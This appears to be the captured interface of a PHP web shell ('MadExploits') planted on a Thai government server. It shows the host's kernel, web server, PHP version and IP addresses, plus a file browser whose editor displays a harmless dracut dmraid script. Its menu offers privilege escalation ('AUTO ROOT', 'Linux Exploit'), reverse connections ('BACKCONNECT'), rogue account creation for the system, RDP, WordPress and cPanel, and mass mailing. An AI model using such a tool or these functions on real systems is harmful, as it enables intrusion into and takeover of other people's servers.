Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
dracut /
modules.d /
90dmraid /
[ HOME SHELL ]
Name
Size
Permission
Action
61-dmraid-imsm.rules
779
B
-rw-r--r--
check
716
B
-rwxr-xr-x
dmraid.sh
930
B
-rwxr-xr-x
install
552
B
-rwxr-xr-x
parse-dm.sh
338
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check
#!/bin/bash # We depend on dm_mod being loaded [ "$1" = "-d" ] && echo dm # if we don't have dmraid installed on the host system, no point # in trying to support it in the initramfs. which dmraid >/dev/null 2>&1 || exit 1 . $dracutfunctions [[ $debug ]] && set -x is_dmraid() { get_fs_type /dev/block/$1 |grep -v linux_raid_member | \ grep -q _raid_member; } [[ $1 = '-h' ]] && { rootdev=$(find_root_block_device) if [[ $rootdev ]]; then # root lives on a block device, so we can be more precise about # hostonly checking check_block_and_slaves is_dmraid "$rootdev" || exit 1 else # root is not on a block device, use the shotgun approach dmraid -r | grep -q ok || exit 1 fi } exit 0
Close